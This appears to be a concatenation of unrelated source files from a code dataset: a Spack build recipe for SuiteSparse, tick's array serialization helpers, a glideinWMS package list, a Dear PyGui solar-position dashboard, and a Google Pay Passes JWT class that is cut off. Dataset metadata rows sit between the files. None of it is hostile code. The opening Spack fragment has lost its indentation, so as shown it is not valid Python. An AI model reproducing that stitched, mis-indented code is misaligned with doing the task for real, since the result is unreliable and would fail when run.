# This patch removes unsupported flags for pgi compiler
patch('pgi.patch', when='%pgi')
def install(self, spec, prefix):
        # The build system of SuiteSparse is quite old-fashioned.
        # It's basically a plain Makefile which includes a header
        # (SuiteSparse_config/SuiteSparse_config.mk) with a lot of convoluted
        # logic in it. Any kind of customization needs to go through
        # filtering of that file.
pic_flag = self.compiler.pic_flag if '+pic' in spec else ''
make_args = [
'INSTALL=%s' % prefix,
# By default, the Makefile uses the Intel compilers if
# they are found. The AUTOCC flag disables this behavior,
# forcing it to use Spack's compiler wrappers.
'AUTOCC=no',
# CUDA=no does NOT disable cuda, it only disables internal search
# for CUDA_PATH. If in addition the latter is empty, then CUDA is
# completely disabled. See
# [SuiteSparse/SuiteSparse_config/SuiteSparse_config.mk] for more.
'CUDA=no',
'CUDA_PATH=%s' % (spec['cuda'].prefix if '+cuda' in spec else ''),
'CFOPENMP=%s' % (self.compiler.openmp_flag
if '+openmp' in spec else ''),
'CFLAGS=-O3 %s' % pic_flag,
# Both FFLAGS and F77FLAGS are used in SuiteSparse makefiles;
# FFLAGS is used in CHOLMOD, F77FLAGS is used in AMD and UMFPACK.
'FFLAGS=%s' % pic_flag,
'F77FLAGS=%s' % pic_flag,
# use Spack's metis in CHOLMOD/Partition module,
# otherwise internal Metis will be compiled
'MY_METIS_LIB=%s' % spec['metis'].libs.ld_flags,
'MY_METIS_INC=%s' % spec['metis'].prefix.include,
            # Make sure Spack's Blas/Lapack is used. Otherwise the system's
            # Blas/Lapack might be picked up. Need to add -lstdc++, following
            # the TCOV path of SuiteSparse 4.5.1's SuiteSparse_config.mk,
            # even though this fix is ugly.
'BLAS=%s' % (spec['blas'].libs.ld_flags + (
'-lstdc++' if '@4.5.1' in spec else '')),
'LAPACK=%s' % spec['lapack'].libs.ld_flags,
]
# SuiteSparse defaults to using '-fno-common -fexceptions' in
# CFLAGS, but not all compilers use the same flags for these
# optimizations
if any([x in spec
for x in ('%clang', '%gcc', '%intel')]):
make_args += ['CFLAGS+=-fno-common -fexceptions']
elif '%pgi' in spec:
make_args += ['CFLAGS+=--exceptions']
if '%xl' in spec or '%xl_r' in spec:
make_args += ['CFLAGS+=-DBLAS_NO_UNDERSCORE']
# Intel TBB in SuiteSparseQR
if 'tbb' in spec:
make_args += [
'SPQR_CONFIG=-DHAVE_TBB',
'TBB=-L%s -ltbb' % spec['tbb'].prefix.lib,
]
make('install', *make_args)
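# Purely illustrative: the make_args assembled above become variable overrides
# on the make command line, roughly of this shape (paths hypothetical).
demo_args = ['INSTALL=/opt/suite-sparse', 'AUTOCC=no', 'CUDA=no']
print('make install ' + ' '.join(demo_args))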
| 44.876033
| 122
| 0.618416
| 4,172
| 0.768324
| 0
| 0
| 0
| 0
| 0
| 0
| 3,703
| 0.681952
|
429b606cd5d96a46f963693074a289b595badea4
| 4,580
|
py
|
Python
|
tick/array/serialize.py
|
andro2157/tick
|
d22d0e70c8bb2d5b232ffa7b97426010c2328edc
|
[
"BSD-3-Clause"
] | null | null | null |
tick/array/serialize.py
|
andro2157/tick
|
d22d0e70c8bb2d5b232ffa7b97426010c2328edc
|
[
"BSD-3-Clause"
] | null | null | null |
tick/array/serialize.py
|
andro2157/tick
|
d22d0e70c8bb2d5b232ffa7b97426010c2328edc
|
[
"BSD-3-Clause"
] | null | null | null |
# License: BSD 3 clause
import os
import numpy as np
import scipy
from tick.array.build.array import (
tick_float_array_to_file,
tick_float_array2d_to_file,
tick_float_sparse2d_to_file,
tick_double_array_to_file,
tick_double_array2d_to_file,
tick_double_sparse2d_to_file,
tick_float_array_from_file,
tick_float_array2d_from_file,
tick_float_sparse2d_from_file,
tick_double_array_from_file,
tick_double_array2d_from_file,
tick_double_sparse2d_from_file,
)
def serialize_array(array, filepath):
"""Save an array on disk on a format that tick C++ modules can read
This method is intended to be used by developpers only, mostly for
benchmarking in C++ on real datasets imported from Python
Parameters
----------
array : `np.ndarray` or `scipy.sparse.csr_matrix`
1d or 2d array
filepath : `str`
Path where the array will be stored
Returns
-------
path : `str`
Global path of the serialized array
"""
if array.dtype not in [np.float32, np.float64]:
        raise ValueError('Only float32/64 arrays can be serialized')
if array.dtype == "float32":
if isinstance(array, np.ndarray):
if len(array.shape) == 1:
serializer = tick_float_array_to_file
elif len(array.shape) == 2:
serializer = tick_float_array2d_to_file
else:
                raise ValueError('Only 1d and 2d arrays can be serialized')
else:
if len(array.shape) == 2:
serializer = tick_float_sparse2d_to_file
else:
                raise ValueError('Only 2d sparse arrays can be serialized')
elif array.dtype == "float64" or array.dtype == "double":
if isinstance(array, np.ndarray):
if len(array.shape) == 1:
serializer = tick_double_array_to_file
elif len(array.shape) == 2:
serializer = tick_double_array2d_to_file
else:
                raise ValueError('Only 1d and 2d arrays can be serialized')
else:
if len(array.shape) == 2:
serializer = tick_double_sparse2d_to_file
else:
                raise ValueError('Only 2d sparse arrays can be serialized')
else:
        raise ValueError('Unhandled serialization type')
serializer(filepath, array)
return os.path.abspath(filepath)
def load_array(filepath, array_type='dense', array_dim=1, dtype="float64"):
"""Loaf an array from disk from a format that tick C++ modules can read
This method is intended to be used by developpers only, mostly for
benchmarking in C++ on real datasets imported from Python
Parameters
----------
filepath : `str`
Path where the array was stored
array_type : {'dense', 'sparse'}, default='dense'
Expected type of the array
array_dim : `int`
Expected dimension of the array
Returns
-------
array : `np.ndarray` or `scipy.sparse.csr_matrix`
1d or 2d array
"""
abspath = os.path.abspath(filepath)
if not os.path.exists(filepath):
        raise FileNotFoundError('File {} does not exist'.format(abspath))
if dtype == "float32":
if array_type == 'dense':
if array_dim == 1:
reader = tick_float_array_from_file
elif array_dim == 2:
reader = tick_float_array2d_from_file
else:
raise ValueError('Only 1d and 2d arrays can be loaded')
elif array_type == 'sparse':
if array_dim == 2:
reader = tick_float_sparse2d_from_file
else:
raise ValueError('Only 2d sparse arrays can be loaded')
else:
raise ValueError('Cannot load this class of array')
elif dtype == "float64" or dtype == "double":
if array_type == 'dense':
if array_dim == 1:
reader = tick_double_array_from_file
elif array_dim == 2:
reader = tick_double_array2d_from_file
else:
raise ValueError('Only 1d and 2d arrays can be loaded')
elif array_type == 'sparse':
if array_dim == 2:
reader = tick_double_sparse2d_from_file
else:
raise ValueError('Only 2d sparse arrays can be loaded')
else:
raise ValueError('Cannot load this class of array')
else:
        raise ValueError('Unhandled serialization type')
return reader(filepath)
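# A hedged round-trip sketch of the two helpers above; the file name is
# hypothetical and the on-disk format is only meaningful to tick's C++ readers.
if __name__ == '__main__':
    original = np.arange(10, dtype='float64')
    path = serialize_array(original, 'example_array.bin')
    restored = load_array(path, array_type='dense', array_dim=1, dtype='float64')
    assert np.allclose(original, restored)
    os.remove(path)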
| 32.94964
| 76
| 0.613974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,662
| 0.362882
|
429b9b03d73a5f7f9bbccc750f09ea936a25f8a0
| 78
|
py
|
Python
|
__init__.py
|
bbockelm/glideinWMS
|
a2b39e3d4ff6c4527efad54b1eefe728a4ec9d18
|
[
"BSD-3-Clause"
] | null | null | null |
__init__.py
|
bbockelm/glideinWMS
|
a2b39e3d4ff6c4527efad54b1eefe728a4ec9d18
|
[
"BSD-3-Clause"
] | 3
|
2015-12-02T19:37:45.000Z
|
2016-01-20T03:21:48.000Z
|
__init__.py
|
bbockelm/glideinWMS
|
a2b39e3d4ff6c4527efad54b1eefe728a4ec9d18
|
[
"BSD-3-Clause"
] | 1
|
2015-12-01T23:02:41.000Z
|
2015-12-01T23:02:41.000Z
|
__all__=["factory","frontend","lib","tools","creation","install","unittests"]
| 39
| 77
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 61
| 0.782051
|
429beefc88e6c9cf72106405ad5b6e321025f9d6
| 20,658
|
py
|
Python
|
views/menuVisualizacaoGeral.py
|
iOsnaaente/Tracker-solar-Supervisorio
|
9790c34f0d9df283bc1b92f79b2807875dbcfe3e
|
[
"MIT"
] | 2
|
2022-01-29T21:33:12.000Z
|
2022-02-01T12:41:35.000Z
|
views/menuVisualizacaoGeral.py
|
iOsnaaente/Tracker-solar-Supervisorio
|
9790c34f0d9df283bc1b92f79b2807875dbcfe3e
|
[
"MIT"
] | null | null | null |
views/menuVisualizacaoGeral.py
|
iOsnaaente/Tracker-solar-Supervisorio
|
9790c34f0d9df283bc1b92f79b2807875dbcfe3e
|
[
"MIT"
] | null | null | null |
import dearpygui.dearpygui as dpg
import datetime as dt
import math
from registry import *
SUN_DATA.update_date()
# FUNCTIONS
def get_semi_circle_points( center, radius, angle_i, angle_f, segments = 360, closed = False ):
points_close = [[ center[0], center[1]-radius ] , center, [ center[0] + radius, center[1] ] ]
angles = [ ((angle_f - angle_i)/segments)*n for n in range(segments) ]
points = [ [ center[0] + radius*math.cos(ang), center[1] - radius*math.sin(ang) ] for ang in angles ]
if closed:
points_close.extend( points )
return points_close
else:
return points
def draw_sun_trajetory( draw_id, parent_id, all_day = False, extremes = False ):
    # Center point, screen dimensions and radius
width, height = dpg.get_item_width( draw_id ), dpg.get_item_height( draw_id )
center = [ width//2, height//2 ]
r = width//2 - 20 if width+20 <= height else height//2 - 20
id_link = draw_id*100
    # DRAW THE SUNRISE AND SUNSET LINES
azi = SUN_DATA.get_pos_from_date( SUN_DATA.rising )[1]
alt = SUN_DATA.get_pos_from_date( SUN_DATA.sunset )[1] # [ alt , azi ]
    # GET THE ANGLES ALONG THE SUN'S TRAJECTORY
dots = SUN_DATA.trajetory(100, all_day )
    # POINTS IN TERMS OF azimuth - altitude
dots = [ [ x - math.pi/2 , y ] for x, y, _ in dots ]
dots = [ [ center[0] + math.cos(x)*r, center[1] + math.sin(x)*math.cos(y)*r ] for x, y in dots ]
    # DRAW THE SUN AT ITS POSITION
sun = [ SUN_DATA.azi - math.pi/2, SUN_DATA.alt ]
sun = [ center[0] + math.cos(sun[0])*r, center[1] + math.sin(sun[0])*math.cos(sun[1])*r ]
dpg.draw_line( parent = draw_id, tag = id_link+1 , p1 = [center[0] - r, center[1]] , p2 = [center[0] + r, center[1]] , color = COLOR['gray'](155) , thickness = 1 )
dpg.draw_line( parent = draw_id, tag = id_link+2 , p1 = center , p2 = [center[0] + r*math.cos(azi-math.pi/2), center[1] + r*math.sin(azi-math.pi/2)], color = COLOR['orange'](155), thickness = 2 )
dpg.draw_line( parent = draw_id, tag = id_link+3 , p1 = center , p2 = [center[0] + r*math.cos(alt-math.pi/2), center[1] + r*math.sin(alt-math.pi/2)], color = COLOR['gray'](200) , thickness = 2 )
dpg.draw_circle( parent = draw_id, tag = id_link+4 , center = center , radius = r , color = COLOR['white'](200) , fill = COLOR['white'](10 ), thickness = 3 )
dpg.draw_circle( parent = draw_id, tag = id_link+5 , center = center , radius = 3 , color = COLOR['white'](200) , fill = COLOR['white'](255), thickness = 2 )
dpg.draw_text( parent = draw_id, tag = id_link+6 , pos = [center[0] -(r +20), center[1] -10 ] , text = 'W' , color = COLOR['white'](200) , size = 20 )
dpg.draw_text( parent = draw_id, tag = id_link+7 , pos = [center[0] +(r +5) , center[1] -10 ] , text = 'E' , color = COLOR['white'](200) , size = 20 )
dpg.draw_text( parent = draw_id, tag = id_link+8 , pos = [center[0] -10 , center[1] -(r +25)], text = 'N' , color = COLOR['white'](255) , size = 20 )
dpg.draw_polyline( parent = draw_id, tag = id_link+9 , points = dots , color = COLOR['red'](155) , thickness = 2 , closed = False )
for n, p in enumerate(dots):
dpg.draw_circle( parent = draw_id, tag = id_link+(12+n) , center = p , radius = 2 , color = [n*4, 255-n*2, n*2, 255] )
dpg.draw_line( parent = draw_id, tag = id_link+10 , p1 = center, p2 = sun, color = COLOR['yellow'](200) , thickness = 2 )
dpg.draw_circle( parent = draw_id, tag = id_link+11 , center = sun , radius = 10 , color = COLOR['yellow'](155) , fill = COLOR['yellow'](255) )
def update_sun_trajetory( draw_id, parent_id, all_day = False ):
    # Center point, screen dimensions and radius
width, height = dpg.get_item_width( draw_id ), dpg.get_item_height( draw_id )
w, h = dpg.get_item_width( 'mainWindow' ) , dpg.get_item_height('mainWindow' )
center = [ width//2, height//2 ]
r = width//2 - 20 if width+20 <= height else height//2 - 20
id_link = draw_id*100
    # DRAW THE SUNRISE AND SUNSET LINES
azi = SUN_DATA.get_pos_from_date( SUN_DATA.rising )[1]
alt = SUN_DATA.get_pos_from_date( SUN_DATA.sunset )[1] # [ alt , azi ]
    # GET THE ANGLES ALONG THE SUN'S TRAJECTORY
dots = SUN_DATA.trajetory(100, all_day )
dots = [ [ x - math.pi/2 , y ] for x, y, _ in dots ]
dots = [ [ center[0] + math.cos(x)*r, center[1] + math.sin(x)*math.cos(y)*r ] for x, y in dots ]
    # DRAW THE SUN AT ITS POSITION
sun = [ SUN_DATA.azi - math.pi/2, SUN_DATA.alt ]
sun = [ center[0] + math.cos(sun[0])*r, center[1] + math.sin(sun[0])*math.cos(sun[1])*r ]
    # STATIC DRAWING
dpg.configure_item( id_link+1 , p1 = [center[0] - r, center[1]], p2 = [center[0] + r, center[1]] )
dpg.configure_item( id_link+2 , p1 = center , p2 = [center[0] + r*math.cos(azi-math.pi/2), center[1] + r*math.sin(azi-math.pi/2)] )
dpg.configure_item( id_link+3 , p1 = center , p2 = [center[0] + r*math.cos(alt-math.pi/2), center[1] + r*math.sin(alt-math.pi/2)] )
dpg.configure_item( id_link+4 , center = center , radius = r )
dpg.configure_item( id_link+5 , center = center , radius = 3 )
dpg.configure_item( id_link+6 , pos = [center[0] - (r + 20), center[1] -10 ] )
dpg.configure_item( id_link+7 , pos = [center[0] + (r + 5), center[1] -10 ] )
dpg.configure_item( id_link+8 , pos = [center[0] - 10 , center[1] - (r + 25) ] )
dpg.configure_item( id_link+9 , points = dots )
dpg.configure_item( id_link+10, p1 = center , p2 = sun )
dpg.configure_item( id_link+11, center = sun )
for n, p in enumerate(dots):
dpg.configure_item( id_link+(12+n) , center = p )
def att_sunpos_graphs( ):
last_date = SUN_DATA.date
if not dpg.get_value( HORA_MANUAL ): SUN_DATA.set_date( dt.datetime.utcnow() )
else: SUN_DATA.set_date( dt.datetime( dpg.get_value(YEAR), dpg.get_value(MONTH), dpg.get_value(DAY), dpg.get_value(HOUR), dpg.get_value(MINUTE), dpg.get_value(SECOND) ) )
azi_alt = SUN_DATA.trajetory( 50, all_day = False )
SUN_DATA.set_date( last_date )
AZI = []
ALT = []
PTI = []
for azi, alt, tim in azi_alt:
AZI.append( math.degrees(azi - math.pi) if azi > math.pi else math.degrees(azi + math.pi) )
ALT.append( math.degrees(alt) if alt < math.pi else 0 )
PTI.append( int( dt.datetime.timestamp( tim )) )
azi, alt = [math.degrees(SUN_DATA.azi)], [math.degrees(SUN_DATA.alt)]
    time_scrt = [dt.datetime.timestamp( last_date )] # POSIX timestamp on the time axis (same units as PTI)
SUN_DATA.set_date( last_date )
dpg.configure_item (22_13, x = PTI , y = AZI )
dpg.configure_item (22_14, x = time_scrt, y = azi )
dpg.set_axis_limits(22_11, ymin = PTI[0] , ymax = PTI[-1] )
dpg.configure_item (22_23, x = PTI , y = ALT )
dpg.configure_item (22_24, x = time_scrt, y = alt )
dpg.set_axis_limits(22_21, ymin = PTI[0] , ymax = PTI[-1] )
# MAIN FUNCTIONS
def init_visualizacaoGeral( windows : dict ):
    # SUN POSITION
with dpg.window( label = 'Posição solar' , tag = 21_0, pos = [50,50], width = 500 , height = 500 , no_move = True, no_resize = True, no_collapse = True, no_close = True, no_title_bar= True ) as Posicao_sol_VG:
windows["Visualizacao geral"].append( Posicao_sol_VG )
w, h = dpg.get_item_width(2_1_0), dpg.get_item_height(2_1_0)
dpg.add_drawlist ( tag = 21_1_0, width = w-20 , height = h-50, label = 'Solar')
draw_sun_trajetory ( draw_id = 2_1_1_0, parent_id = 2_1_0 )
    # SUN POSITION DISPLAY - USE GRAPHS - SAME AS THE TOOLTIP
with dpg.window( label = 'Atuação' , tag = 22_0, no_move = True , no_resize = True, no_collapse = True, no_close = True ) as Atuacao_VG:
windows["Visualizacao geral"].append( Atuacao_VG )
dpg.add_text('Área para a atução da posição dos paineis solares')
with dpg.group( horizontal = True ):
with dpg.plot( tag = 2_2_1_0, label = 'Azimute do dia', height = 312, width = 478, anti_aliased = True ):
dpg.add_plot_legend()
dpg.add_plot_axis( dpg.mvXAxis, label = 'Hora [h]' , tag = 2_2_1_1, parent = 2_2_1_0, time = True, no_tick_labels = True ) # X
dpg.add_plot_axis( dpg.mvYAxis, label = 'Angulo [º]', tag = 2_2_1_2, parent = 2_2_1_0 ) # Y
dpg.set_axis_limits_auto( 2_2_1_1 )
dpg.set_axis_limits ( 2_2_1_2, -5, 370 )
dpg.add_line_series ( [], [], tag = 2_2_1_3, label = 'Rota diária', parent = 2_2_1_2 )
dpg.add_scatter_series ( [], [], tag = 2_2_1_4, label = 'Ponto atual', parent = 2_2_1_2 )
with dpg.plot( tag = 2_2_2_0, label = 'Altitude do dia', height = 312, width = 478, anti_aliased = True ):
dpg.add_plot_axis( dpg.mvXAxis, label = 'Hora [h]' , tag = 2_2_2_1, parent = 2_2_2_0, time = True, no_tick_labels = True ) # X
dpg.add_plot_axis( dpg.mvYAxis, label = 'Angulo [º]', tag = 2_2_2_2, parent = 2_2_2_0 ) # Y
dpg.set_axis_limits_auto( 2_2_2_1 )
dpg.set_axis_limits ( 2_2_2_2, -5, 100 )
dpg.add_plot_legend()
dpg.add_line_series ( [], [], tag = 2_2_2_3, label = 'Rota diária', parent = 2_2_2_2 )
dpg.add_scatter_series ( [], [], tag = 2_2_2_4, label = 'Ponto atual', parent = 2_2_2_2 )
att_sunpos_graphs( )
    # TIME SETTINGS - USE WINDOW FOR HOUR_MANUAL
with dpg.window( label = 'Painel de log' , tag = 23_0, no_move = True , no_resize = True, no_collapse = True, no_close = True, no_title_bar = True ) as Painel_log_VG:
windows["Visualizacao geral"].append( Painel_log_VG )
dpg.add_text( default_value = 'Informações gerais do sistema')
with dpg.child_window( tag = 23_00, autosize_x = True, height = 170, menubar = True):
with dpg.menu_bar( tag = 23_01, label = 'menubar para datetime',):
dpg.add_menu_item( tag = 23_02, label = 'Hora automática', callback = lambda s, d, u : dpg.set_value(HORA_MANUAL, False), shortcut = 'A data e hora de calculo é definida automaticamente de acordo com a hora do controlador local')
dpg.add_menu_item( tag = 23_03, label = 'Hora manual' , callback = lambda s, d, u : dpg.set_value(HORA_MANUAL, True ), shortcut = 'A data e hora de calculo é definida pela entrada do operador no supervisório' )
with dpg.child_window( tag = 23_10):
            # General system information - automatic
dpg.add_text( default_value = 'Hora automática')
dpg.add_drag_floatx( tag = 23_1, label = 'Ano/Mes/Dia Auto' , size = 3, format = '%.0f', speed = 0.1 , min_value = 1 , max_value = 3000 , no_input = True )
dpg.add_drag_floatx( tag = 23_2, label = 'Hora/Min/Sec Auto' , size = 3, format = '%.0f', speed = 0.1 , no_input = True )
dpg.add_drag_int ( tag = 23_3, label = 'Valor no dia' , format = '%.0f' , speed = 0.1 , min_value = 0 , max_value = 26*3600, no_input = True, source = TOT_SECONDS, enabled = False)
dpg.add_drag_int ( tag = 23_4, label = 'Dia Juliano' , format = '%.0f' , speed = 0.1 , min_value = 0 , max_value = 366 , no_input = True, source = JULIANSDAY , enabled = False)
with dpg.child_window( tag = 23_20):
            # General system information - manual
dpg.add_text( default_value = 'Hora manual')
dpg.add_input_floatx( tag = 23_6, label = 'Ano/Mes/Dia Manual' , size = 3, default_value = [2020, 12, 25], format='%.0f', min_value = 1, max_value = 3000 )
dpg.add_input_floatx( tag = 23_7, label = 'Hora/Min/Sec Manual', size = 3, default_value = [20, 30, 10] , format='%.0f', min_value = 1, max_value = 60 )
dpg.add_drag_int ( tag = 23_8, label = 'Valor no dia' , format = '%.0f', speed = 0.1 , min_value = 0, max_value = 24*3600, no_input = True, source = TOT_SECONDS, enabled = False )
dpg.add_drag_int ( tag = 23_9, label = 'Dia Juliano' , format = '%.0f', speed = 0.1 , min_value = 0, max_value = 366 , no_input = True, source = JULIANSDAY , enabled = False )
dpg.hide_item( 23_20 ) if dpg.get_value(HORA_MANUAL) == False else dpg.hide_item( 2_3_1_0 )
dpg.add_spacer( height = 5 )
with dpg.child_window( tag = 23_30, autosize_x = True, autosize_y = True ):
            # Local longitude and latitude settings
with dpg.child_window ( height = 90 ):
dpg.add_text ( default_value = 'Definições de longitude e latitude local')
dpg.add_input_float( label = 'Latitude' , tag = 2_3_10, min_value = -90, max_value = 90, format = '%3.8f', indent=0.01, source = LATITUDE , callback = lambda sender, data, user : SUN_DATA.set_latitude( data ) )
dpg.add_spacer ( )
dpg.add_input_float( label = 'Longitude', tag = 2_3_11, min_value = -90, max_value = 90, format = '%3.8f', indent=0.01, source = LONGITUDE, callback = lambda sender, data, user : SUN_DATA.set_longitude( data ) )
dpg.add_spacer( height = 5 )
with dpg.child_window( height = 150 ):
            # Sun information
dpg.add_text ( default_value = 'Informacoes do sol')
dpg.add_drag_float ( label = 'Azimute' , tag = 23_12, format = '%4.2f', speed = 1, no_input = True, source = AZIMUTE )
dpg.add_spacer ( )
dpg.add_drag_float ( label = 'Altitude' , tag = 23_13, format = '%4.2f', speed = 1, no_input = True, source = ZENITE )
dpg.add_spacer ( )
dpg.add_drag_float ( label = 'Elevação (m)' , tag = 23_14, format = '%4.0f', speed = 1, no_input = True, source = ALTITUDE )
dpg.add_spacer ( )
dpg.add_drag_floatx( label = 'Horas de sol' , tag = 23_15, size = 3, format = '%.0f', no_input = True )
dpg.add_spacer( height = 5 )
with dpg.child_window( height = 200 ):
            # Positions of interest
dpg.add_text ( default_value = "Posicoes de interesse", )
dpg.add_text ( default_value = 'Nascer do sol (hh/mm/ss)')
dpg.add_drag_floatx( tag = 2_3_16, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_SUNRISE , data.extend([0])) )
dpg.add_spacer ( )
dpg.add_text ( default_value = 'Culminante (hh/mm/ss)' )
dpg.add_drag_floatx( tag = 2_3_17, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_SUNSET , data.extend([0])) )
dpg.add_spacer ( )
dpg.add_text ( default_value = 'Por do sol (hh/mm/ss)' )
dpg.add_drag_floatx( tag = 2_3_18, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_CULMINANT, data.extend([0])) )
dpg.hide_item( 21_0 )
dpg.hide_item( 22_0 )
dpg.hide_item( 23_0 )
def resize_visualizacaoGeral( ):
# get the main_window dimension
w , h = dpg.get_item_width( 'mainWindow' ), dpg.get_item_height( 'mainWindow' )
dpg.configure_item( 21_0 , width = w*2/3 , height = h*3/5 , pos = [10 , 25 ] ) # DRAWING
dpg.configure_item( 22_0 , width = w*2/3 , height = (h*2/5)-35 , pos = [10 , (h*3/5)+30 ] ) # SUNPATH
dpg.configure_item( 23_0 , width = w/3 -20 , height = h - 30 , pos = [ w*2/3 +15, 25 ] ) # LOG
# get the child_window_window dimension
w1, h1 = dpg.get_item_width( 21_0 ), dpg.get_item_height( 21_0 )
dpg.configure_item( 21_10 , width = w1-20 , height = h1-50 ) # DRAWLIST
update_sun_trajetory( draw_id = 2_1_1_0 , parent_id = 2_1_0 ) # DRAWING
    # SUNPATH: UPDATE CHILD_WINDOW
    dpg.configure_item( 22_10 , width = (w/3)-15 , height = (h*2/5)*0.8 , pos = [ 5 , 20 ] ) # ROTATION
    dpg.configure_item( 22_20 , width = (w/3)-15 , height = (h*2/5)*0.8 , pos = [ (w*2/3)//2 +5, 20 ] ) # ELEVATION
def render_visualizacaoGeral( ):
global TOT_SECONDS , JULIANSDAY, HORA_MANUAL
global HOUR, MINUTE, SECOND
global YEAR, MONTH , DAY
    # Automatic time
if dpg.get_value( HORA_MANUAL ) == False :
SUN_DATA.update_date()
        dpg.set_value( 23_1, value = [ dpg.get_value(YEAR), dpg.get_value(MONTH) , dpg.get_value(DAY) ] ) # AUTOMATIC DATE
        dpg.set_value( 23_2, value = [ dpg.get_value(HOUR), dpg.get_value(MINUTE), dpg.get_value(SECOND)] ) # AUTOMATIC TIME
dpg.hide_item( 23_2_0 )
dpg.show_item( 23_1_0 )
    # Manual time
else:
yearm, monthm, daym = dpg.get_value( 23_6 )[:-1]
hourm, minutem, secondm = dpg.get_value( 23_7 )[:-1]
try:
data = dt.datetime( int(yearm), int(monthm), int(daym), int(hourm), int(minutem), int(secondm) )
dt.datetime.timestamp( data )
SUN_DATA.set_date( data )
SUN_DATA.update()
dpg.set_value(YEAR , yearm )
dpg.set_value(MONTH , monthm )
dpg.set_value(DAY , daym )
dpg.set_value(HOUR , hourm )
dpg.set_value(MINUTE, minutem)
dpg.set_value(SECOND, secondm)
except:
pass
        # Total seconds in the day
        dpg.set_value( 23_9, SUN_DATA.dia_juliano ) # JULIAN DAY
        dpg.set_value( 23_8, SUN_DATA.total_seconds) # TOTAL SECONDS
dpg.hide_item( 23_1_0 )
dpg.show_item( 23_2_0 )
    # Set azimuth, altitude and elevation
    dpg.set_value( 23_12, math.degrees( SUN_DATA.azi) ) # AZIMUTH
    dpg.set_value( 23_13, math.degrees( SUN_DATA.alt) ) # ALTITUDE
    dpg.set_value( 23_14, SUN_DATA.altitude ) # ELEVATION
    # Set the hours of sunlight, deriving hours, minutes and seconds from the total seconds
diff_sunlight = (SUN_DATA.sunset - SUN_DATA.rising).seconds
dpg.set_value( 2_3_15, [diff_sunlight//3600, (diff_sunlight//60)%60 , diff_sunlight%60 ] )
    # Set the sunrise, culmination (highest point) and sunset information
    dpg.set_value( 23_16, [ SUN_DATA.rising.hour+SUN_DATA.utc_local , SUN_DATA.rising.minute , SUN_DATA.rising.second ] ) # 'Sunrise'
    dpg.set_value( 23_17, [ SUN_DATA.transit.hour+SUN_DATA.utc_local, SUN_DATA.transit.minute, SUN_DATA.transit.second ] ) # 'Culmination'
    dpg.set_value( 23_18, [ SUN_DATA.sunset.hour+SUN_DATA.utc_local , SUN_DATA.sunset.minute , SUN_DATA.sunset.second ] ) # 'Sunset'
update_sun_trajetory( draw_id = 21_1_0 , parent_id = 21_0 )
att_sunpos_graphs()
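# Note on the numeric tags used throughout this file: underscores in numeric
# literals are only digit separators (PEP 515), so tags such as 2_2_1_0 and
# 22_13 are plain integers, not structured identifiers.
assert 2_2_1_0 == 2210 and 22_13 == 2213 and 21_1_0 == 2110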
| 70.989691
| 267
| 0.554265
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,651
| 0.127932
|
429cb5fb216dbdf5ec9ff71a33c2d298dd2c8210
| 4,071
|
py
|
Python
|
python/jwt.py
|
angelbarranco/passes-rest-samples
|
93f54e3e7b651bcfd1b269e2bcd5d9bf9d50ad8c
|
[
"Apache-2.0"
] | 95
|
2019-06-05T12:45:15.000Z
|
2022-03-30T14:02:27.000Z
|
python/jwt.py
|
angelbarranco/passes-rest-samples
|
93f54e3e7b651bcfd1b269e2bcd5d9bf9d50ad8c
|
[
"Apache-2.0"
] | 21
|
2019-06-18T15:41:41.000Z
|
2022-03-04T15:29:57.000Z
|
python/jwt.py
|
angelbarranco/passes-rest-samples
|
93f54e3e7b651bcfd1b269e2bcd5d9bf9d50ad8c
|
[
"Apache-2.0"
] | 45
|
2019-06-13T20:57:11.000Z
|
2022-03-21T13:43:31.000Z
|
"""
Copyright 2019 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import config
import time
# for jwt signing. see https://google-auth.readthedocs.io/en/latest/reference/google.auth.jwt.html#module-google.auth.jwt
from google.auth import crypt as cryptGoogle
from google.auth import jwt as jwtGoogle
#############################
#
# class that defines JWT format for a Google Pay Pass.
#
# to check the JWT protocol for Google Pay Passes, check:
# https://developers.google.com/pay/passes/reference/s2w-reference#google-pay-api-for-passes-jwt
#
# also demonstrates RSA-SHA256 signing implementation to make the signed JWT used
# in links and buttons. Learn more:
# https://developers.google.com/pay/passes/guides/get-started/implementing-the-api/save-to-google-pay
#
#############################
class googlePassJwt:
def __init__(self):
self.audience = config.AUDIENCE
self.type = config.JWT_TYPE
self.iss = config.SERVICE_ACCOUNT_EMAIL_ADDRESS
self.origins = config.ORIGINS
self.iat = int(time.time())
self.payload = {}
# signer for RSA-SHA256. Uses same private key used in OAuth2.0
self.signer = cryptGoogle.RSASigner.from_service_account_file(config.SERVICE_ACCOUNT_FILE)
def addOfferClass(self, resourcePayload):
self.payload.setdefault('offerClasses',[])
self.payload['offerClasses'].append(resourcePayload)
def addOfferObject(self, resourcePayload):
self.payload.setdefault('offerObjects',[])
self.payload['offerObjects'].append(resourcePayload)
def addLoyaltyClass(self, resourcePayload):
self.payload.setdefault('loyaltyClasses',[])
self.payload['loyaltyClasses'].append(resourcePayload)
def addLoyaltyObject(self, resourcePayload):
self.payload.setdefault('loyaltyObjects',[])
self.payload['loyaltyObjects'].append(resourcePayload)
def addGiftcardClass(self, resourcePayload):
self.payload.setdefault('giftCardClasses',[])
self.payload['giftCardClasses'].append(resourcePayload)
def addGiftcardObject(self, resourcePayload):
self.payload.setdefault('giftCardObjects',[])
self.payload['giftCardObjects'].append(resourcePayload)
def addEventTicketClass(self, resourcePayload):
self.payload.setdefault('eventTicketClasses',[])
self.payload['eventTicketClasses'].append(resourcePayload)
def addEventTicketObject(self, resourcePayload):
self.payload.setdefault('eventTicketObjects',[])
self.payload['eventTicketObjects'].append(resourcePayload)
def addFlightClass(self, resourcePayload):
self.payload.setdefault('flightClasses',[])
